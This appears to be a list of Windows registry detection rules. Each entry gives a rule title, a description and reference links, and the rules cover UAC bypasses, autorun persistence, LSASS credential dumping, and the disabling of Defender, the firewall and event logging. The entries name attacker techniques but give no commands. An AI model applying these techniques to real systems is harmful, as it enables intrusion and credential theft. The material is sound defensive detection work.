UAC Bypass Via Wsreset Unfixed method for UAC bypass from Windows 10. WSReset.exe is a file associated with the Windows Store. It will run a binary file contained in a low-privilege registry key. https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly, https://lolbas-project.github.io/lolbas/Binaries/Wsreset
CMSTP Execution Registry Event Detects various indicators of Microsoft Connection Manager Profile Installer execution https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
Disable Security Events Logging Adding Reg Key MiniNt Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, the Windows Event Log service will stop writing events. https://twitter.com/0gtweet/status/1182516740955226112
Esentutl Volume Shadow Copy Service Keys Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy
Wdigest CredGuard Registry Modification Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials. https://teamhydra.blog/2020/08/25/bypassing-credential-guard/
Windows Credential Editor Registry Detects the use of Windows Credential Editor (WCE) https://www.ampliasecurity.com/research/windows-credentials-editor/
HybridConnectionManager Service Installation - Registry Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function. https://twitter.com/Cyb3rWard0g/status/1381642789369286662
Registry Entries For Azorult Malware Detects the presence of a registry key created during Azorult execution https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a
Potential Qakbot Registry Activity Detects a registry key used by IceID in a campaign that distributes malicious OneNote files https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
PrinterNightmare Mimikatz Driver Name Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760, https://www.lexjansen.com/sesug/1993/SESUG93035.pdf, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913, https://nvd.nist.gov/vuln/detail/cve-2021-1675, https://nvd.nist.gov/vuln/detail/cve-2021-34527
Path To Screensaver Binary Modified Detects value modification of registry key containing path to binary used as screensaver. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md, https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
Narrator's Feedback-Hub Persistence Detects abusing Windows 10 Narrator's Feedback-Hub https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html
New DLL Added to AppCertDlls Registry Key Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/, https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html
NetNTLM Downgrade Attack - Registry Detects NetNTLM downgrade attack https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks, https://www.ultimatewindowssecurity.com/wiki/page.aspx?spid=NSrpcservers
New DLL Added to AppInit_DLLs Registry Key DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html
Office Application Startup - Office Test Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/
Windows Registry Trust Record Modification Alerts on trust record modification within the registry, indicating usage of macros https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/, http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html, https://twitter.com/inversecos/status/1494174785621819397
Registry Persistence Mechanisms in Recycle Bin Detects persistence registry keys for Recycle Bin https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf, https://persistence-info.github.io/Data/recyclebin.html, https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/
New PortProxy Registry Entry Added Detects the modification of the PortProxy registry key which is used for port forwarding. https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html, https://adepts.of0x.cc/netsh-portproxy-code/, https://www.dfirnotes.net/portproxy_detection/
RedMimicry Winnti Playbook Registry Manipulation Detects actions caused by the RedMimicry Winnti playbook https://redmimicry.com
WINEKEY Registry Modification Detects potential malicious modification of run keys by winekey or team9 backdoor https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
Run Once Task Configuration in Registry Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup https://twitter.com/pabraeken/status/990717080805789697, https://lolbas-project.github.io/lolbas/Binaries/Runonce/
Shell Open Registry Keys Manipulation Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) https://github.com/hfiref0x/UACME, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/, https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass, https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]
Security Support Provider (SSP) Added to LSA Configuration Detects the addition of an SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Install-SSP.ps1#L157
Potential Credential Dumping Via LSASS SilentProcessExit Technique Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/, https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
Sticky Key Like Backdoor Usage - Registry Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
Atbroker Registry Change Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/, https://lolbas-project.github.io/lolbas/Binaries/Atbroker/
Suspicious Run Key from Download Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/
DLL Load via LSASS Detects a method to load DLL via LSASS process using an undocumented Registry key https://blog.xpnsec.com/exploring-mimikatz-part-1/, https://twitter.com/SBousseaden/status/1183745981189427200
Suspicious Camera and Microphone Access Detects processes accessing the camera and microphone from a suspicious folder https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072
Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista
Registry Persistence via Service in Safe Mode Detects the modification of the registry to allow a driver or service to persist in Safe Mode. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network
Add Port Monitor Persistence in Registry Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md
Add Debugger Entry To AeDebug For Persistence Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes https://persistence-info.github.io/Data/aedebug.html, https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging
Allow RDP Remote Assistance Feature Detects enabling of the RDP Remote Assistance feature to allow a specific user to connect via RDP to the targeted machine https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
Potential AMSI COM Server Hijacking Detects changes to the AMSI COM server registry key in order to disable AMSI scanning functionalities. When AMSI attempts to start its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/, https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass
CurrentVersion Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
Common Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://persistence-info.github.io/Data/userinitmprlogonscript.html
Classes Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
CurrentControlSet Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
CurrentVersion NT Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
Internet Explorer Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
Office Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
Session Manager Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
System Scripts Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
WinSock2 Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
Wow6432Node CurrentVersion Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
Wow6432Node Classes Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
New BgInfo.EXE Custom DB Path Registry Configuration Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. Internal Research
Wow6432Node Windows NT CurrentVersion Autorun Keys Modification Detects modification of autostart extensibility point (ASEP) in registry. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
New BgInfo.EXE Custom WMI Query Registry Configuration Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" Internal Research
New BgInfo.EXE Custom VBScript Registry Configuration Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" Internal Research
Bypass UAC Using Event Viewer Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd
Blackbyte Ransomware Registry BlackByte sets three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/
Bypass UAC Using DelegateExecute Bypasses User Account Control using a fileless method https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand, https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute
Bypass UAC Using SilentCleanup Task Detects the setting of the environment variable "windir" to a non-default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task, https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/, https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign
Default RDP Port Changed to Non Standard Port Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller
IE Change Domain Zone Hides the file extension through modification of the registry https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries
Sysmon Driver Altitude Change Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650, https://youtu.be/zSihR3lTf7g
Change Winevt Channel Access Permission Via Registry Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel. https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/, https://learn.microsoft.com/en-us/windows/win32/api/winevt/, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/
Running Chrome VPN Extensions via the Registry 2 VPN Extension Detects running Chrome VPN extensions via the registry (installation of two VPN extensions) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension
ClickOnce Trust Prompt Tampering Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5, https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior
Potential CobaltStrike Service Installations - Registry Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395
COM Hijack via Sdclt Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute' http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass, https://www.exploit-db.com/exploits/47696
CrashControl CrashDump Disabled Detects disabling the CrashDump per registry (as used by HermeticWiper) https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/
Service Binary in Suspicious Folder Detect the creation of a service with a service binary located in a suspicious directory https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Custom File Open Handler Executes PowerShell Detects the abuse of a custom file open handler executing PowerShell https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728
Potential Registry Persistence Attempt Via DbgManagedDebugger Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence, which will get invoked when an application crashes https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/, https://github.com/last-byte/PersistenceSniper
Windows Defender Exclusions Added - Registry Detects the setting of Windows Defender exclusions https://twitter.com/_nullbind/status/1204923340810543109
Potentially Suspicious Desktop Background Change Via Registry Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image. https://www.attackiq.com/2023/09/20/emulating-rhysida/, https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/, https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html, https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI
Antivirus Filter Driver Disallowed On Dev Drive - Registry Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive". https://twitter.com/0gtweet/status/1720419490519752955
Hypervisor Enforced Code Integrity Disabled Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/, https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci
Hypervisor Enforced Paging Translation Disabled Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value, where it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature. https://twitter.com/standa_t/status/1808868985678803222, https://github.com/AaLl86/WindowsInternals/blob/070dc4f317726dfb6ffd2b7a7c121a33a8659b5e/Slides/Hypervisor-enforced%20Paging%20Translation%20-%20The%20end%20of%20non%20data-driven%20Kernel%20Exploits%20(Recon2024).pdf
DHCP Callout DLL Installation Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required) https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx
Disable Exploit Guard Network Protection on Windows Defender Detects disabling Windows Defender Exploit Guard Network Protection https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html
Disable Administrative Share Creation at Startup Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup
Disabled Windows Defender Eventlog Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2
Disable PUA Protection on Windows Defender Detects disabling Windows Defender PUA protection https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html
Disable Tamper Protection on Windows Defender Detects disabling Windows Defender Tamper Protection https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html
Potential AutoLogger Sessions Tampering Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging https://twitter.com/MichalKoczwara/status/1553634816016498688, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
Disable Microsoft Defender Firewall via Registry Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry
Disable Internal Tools or Feature in Registry Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md, https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions, https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage, https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl
Disable Macro Runtime Scan Scope Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/, https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope, https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba
Disable Privacy Settings Experience in Registry Detects registry modifications that disable Privacy Settings Experience https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md
Disable Windows Security Center Notifications Detects setting UseActionCenterExperience to 0 to disable Windows Security Center notifications https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
Registry Disable System Restore Detects the modification of the registry to disable a system restore on the computer https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry
Windows Defender Service Disabled - Registry Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105
Disable Windows Firewall by Registry Detects setting EnableFirewall to 0 to disable the Windows firewall https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md
Disable Windows Event Logging Via Registry Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel https://twitter.com/WhichbufferArda/status/1543900539280293889, https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp
Add DisallowRun Execution to Registry Detects setting DisallowRun to 1 to prevent users from running specific programs https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
Persistence Via Disk Cleanup Handler - Autorun Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. https://persistence-info.github.io/Data/diskcleanuphandler.html, https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/
DNS-over-HTTPS Enabled by Registry Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or to hide the process of exfiltrating data. With this enabled, organizations lose visibility into data such as query type, response and originating IP that are used to identify bad actors. https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html, https://github.com/elastic/detection-rules/issues/1371, https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode, https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS
New DNS ServerLevelPluginDll Installed Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
ETW Logging Disabled In .NET Processes - Sysmon Registry Potential adversaries stopping ETW providers recording loaded .NET assemblies. https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/, 